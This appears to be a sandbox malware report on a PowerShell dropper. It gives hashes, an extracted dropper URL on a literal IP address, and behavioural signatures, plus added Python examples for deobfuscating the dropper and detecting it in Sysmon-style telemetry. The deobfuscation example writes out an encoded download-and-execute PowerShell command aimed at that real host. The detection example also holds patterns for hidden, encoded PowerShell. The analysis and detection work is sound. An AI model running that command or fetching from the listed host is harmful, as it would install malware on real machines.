General

  • Target

    3ae251c03f998e3fe2e49155a03c81b6b3e2556ab2f812868a2ec8bca87f5ae7

  • Size

    46KB

  • Sample

    241113-11jjratmbp

  • MD5

    5ea2abeab52fd2731bfcba44e976931a

  • SHA1

    f5487abbc8837c5a130946158fe72bcbfd0eab10

  • SHA256

    3ae251c03f998e3fe2e49155a03c81b6b3e2556ab2f812868a2ec8bca87f5ae7

  • SHA512

    2f56c5b5a3a794e8f19624f0a6545750fcc9844883a51f95dffdc49ce5d4b345f0f02f34e7b6307ae3c87a9f60f8b0f449b27c95e33afa972e7cc5c48a881d5e

  • SSDEEP

    768:R4SFsv66g3KnF439NKC54kkGfn+cL2XdA8YRtukODXwXqt7sNAQYzKEm8ZRu9Uzp:OSFsv66g3KnF439NKC54kkGfn+cL2Xd+

Malware Config

Extracted

  • Language

    ps1

  • Deobfuscated

  • URLs

    ps1.dropper: https://194.182.164.149:8080/fontawesome.woff
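
The extracted config above is the output of a sandbox decoding and deobfuscating the PowerShell dropper; the following is an added example of how that step is done by hand, not code from the sandbox or from the sample. The dropper one-liner it parses is constructed for the demo (only the URL is the one reported on this page), and the "suspicious URL" thresholds are the example's own heuristics.

```python
import base64
import re
from urllib.parse import urlparse

# Constructed sample, not the script from the sandbox run: the kind of one-liner
# sandboxes tag "ps1.dropper". Only the URL is taken from the report above.
INNER_SCRIPT = (
    "$u = 'htt' + 'ps://194.182.164.149:' + '8080' + '/fontawesome.woff';"
    "IEX (New-Object Net.WebClient).DownloadString($u)"
)
# -EncodedCommand takes the base64 of the UTF-16LE encoded script.
ENCODED = base64.b64encode(INNER_SCRIPT.encode("utf-16-le")).decode("ascii")
SAMPLE_CMDLINE = "powershell.exe -NoP -w hidden -EncodedCommand " + ENCODED

ENC_RE = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.I)
CONCAT_RE = re.compile(r"'([^']*)'\s*\+\s*'([^']*)'")
URL_RE = re.compile(r"https?://[^\s'\"()]+", re.I)


def decode_encoded_command(cmdline):
    """Return the script behind -EncodedCommand; if there is none, the command line itself."""
    m = ENC_RE.search(cmdline)
    if not m:
        return cmdline
    return base64.b64decode(m.group(1)).decode("utf-16-le")


def fold_string_concat(script):
    """Merge 'a' + 'b' into 'ab' until nothing changes, so a split URL becomes one literal."""
    prev = None
    while prev != script:
        prev = script
        script = CONCAT_RE.sub(lambda m: "'" + m.group(1) + m.group(2) + "'", script)
    return script


def extract_urls(cmdline):
    """Decode, deobfuscate and pull every http(s) URL out of a PowerShell command line."""
    script = fold_string_concat(decode_encoded_command(cmdline))
    return sorted(set(URL_RE.findall(script)))


def suspicious_url(url):
    """Heuristic reasons a dropper URL deserves a look; the thresholds are this example's own."""
    p = urlparse(url)
    host = p.hostname or ""
    reasons = []
    if re.fullmatch(r"\d{1,3}(?:\.\d{1,3}){3}", host):
        reasons.append("literal IP address instead of a hostname")
    if p.port not in (None, 80, 443):
        reasons.append("non-standard port %d" % p.port)
    if p.path.lower().endswith((".woff", ".png", ".jpg", ".gif", ".css")):
        reasons.append("static-asset file extension on a payload fetched by a script")
    return reasons


if __name__ == "__main__":
    for url in extract_urls(SAMPLE_CMDLINE):
        print(url, "->", suspicious_url(url) or "nothing notable")
```

The concatenation folding is deliberately iterative: droppers chain many short literals, and a single regex pass only merges neighbouring pairs. Real samples also use format strings, char arrays and `-join`, which this example does not handle; when the static pass comes up empty, the sandbox's dynamic deobfuscation (the "Deobfuscated" column above) is the fallback.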

Targets

    • Target

      3ae251c03f998e3fe2e49155a03c81b6b3e2556ab2f812868a2ec8bca87f5ae7

    Score
    10/10
    • Process spawned unexpected child process

      This typically indicates the parent process was compromised via an exploit or macro.

    • Blocklisted process makes network request

    • Command and Scripting Interpreter: PowerShell

      Runs PowerShell with the display window hidden.
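
The three signatures above (an unexpected child process, a blocklisted process making a network request, and PowerShell launched with a hidden window) are cheap to reproduce on endpoint telemetry. The following is an added example, not the sandbox's own rules: it runs those checks over constructed Sysmon-style process-creation and network-connection events (not records from the sample's run; only the destination matches the dropper URL above) and correlates them per process, because each signature on its own is noisy.

```python
import re

# Constructed Sysmon-style events (EventID 1 = process create, 3 = network connect).
# Not taken from the sample's sandbox run; the destination matches the dropper URL above.
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
EVENTS = [
    {"EventID": 1, "ProcessId": 4120,
     "ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "Image": PS,
     # base64 of the UTF-16LE text "IEX (New-Object", truncated for the example
     "CommandLine": "powershell.exe -NoP -w hidden -EncodedCommand SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQA"},
    {"EventID": 3, "ProcessId": 4120, "Image": PS,
     "DestinationIp": "194.182.164.149", "DestinationPort": 8080},
    # Control case: an admin script started from the shell, talking to a file server on SMB.
    {"EventID": 1, "ProcessId": 5200, "ParentImage": r"C:\Windows\explorer.exe",
     "Image": PS, "CommandLine": r"powershell.exe -File C:\scripts\backup.ps1"},
    {"EventID": 3, "ProcessId": 5200, "Image": PS,
     "DestinationIp": "10.0.0.5", "DestinationPort": 445},
]

OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe", "acrord32.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe",
                "mshta.exe", "rundll32.exe", "regsvr32.exe"}
# -w hidden / -WindowStyle Hidden, -NoProfile, or an encoded command of plausible length
HIDDEN_RE = re.compile(
    r"-w(?:indowstyle)?\s+hidden|-nop(?:rofile)?\b|-e(?:c|nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}",
    re.I)
STANDARD_PORTS = {80, 443}


def basename(path):
    return path.rsplit("\\", 1)[-1].lower()


def analyze(events):
    """Map each process id to the list of signature names it triggered."""
    hits = {}
    for ev in events:
        found = hits.setdefault(ev["ProcessId"], [])
        if ev["EventID"] == 1:
            parent, child = basename(ev["ParentImage"]), basename(ev["Image"])
            if parent in OFFICE_PARENTS and child in SCRIPT_HOSTS:
                found.append("Process spawned unexpected child process")
            if child in ("powershell.exe", "pwsh.exe") and HIDDEN_RE.search(ev["CommandLine"]):
                found.append("Command and Scripting Interpreter: PowerShell")
        elif ev["EventID"] == 3 and basename(ev["Image"]) in SCRIPT_HOSTS:
            name = "Blocklisted process makes network request"
            if ev["DestinationPort"] not in STANDARD_PORTS:
                name += " (non-standard port %d)" % ev["DestinationPort"]
            found.append(name)
    return {pid: names for pid, names in hits.items() if names}


def triage(events, min_hits=2):
    """Process ids worth escalating: those that tripped at least min_hits signatures."""
    return sorted(pid for pid, names in analyze(events).items() if len(names) >= min_hits)


if __name__ == "__main__":
    for pid, names in analyze(EVENTS).items():
        print(pid, names)
    print("escalate:", triage(EVENTS))
```

The control process shows why the sandbox's verdict rests on the combination rather than any one signature: a scheduled backup script also makes PowerShell talk to a non-standard port, and "Blocklisted process makes network request" fires on it just the same. Only the Office-spawned, hidden-window, encoded-command process collects all three, which is the pattern behind the 10/10 score.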

MITRE ATT&CK Enterprise v15
